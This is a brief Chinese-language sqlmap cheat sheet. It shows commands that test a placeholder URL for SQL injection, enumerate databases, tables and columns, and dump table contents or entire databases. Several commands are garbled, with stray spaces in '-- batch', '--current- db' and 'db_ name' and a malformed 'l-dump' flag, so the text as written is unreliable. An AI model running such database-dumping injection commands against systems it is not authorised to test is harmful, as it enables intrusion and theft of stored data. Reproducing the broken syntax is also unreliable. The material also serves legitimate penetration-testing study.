安装好sqlmap后,可以用cmd使用sqlmap
D:
cd sqlmap/sqlmap
python sqlmap.py -u……
常用语句
1.对url进行检测, 判断是否存在SQL注入
python sqlmap.py -u "URL" --batch
2.获取数据库
python sqlmap.py -u "URL" --dbs -- batch获取全部数据库
python sqlmap.py -u "URL" --current- db -- batch获取当前数据库
3.获取当前数据库里所有的表
python sqlmap.py -u "URL" -D db_ name --tables -- batch
4.获取表的字段
python sqlmap.py -u "URL" -D db_ name -T table name --columns -- batch
5.dump字段内容
python sqlmap.py -u "URL" -D db_ name-T table_ name -C "columns(,columns2)"l-dump --batch
如果字段内容多的话可以再加上如--start 1 --stop 100这样就取1-100条数据--dump可以换成--dump-all则导出全部的内容
网友评论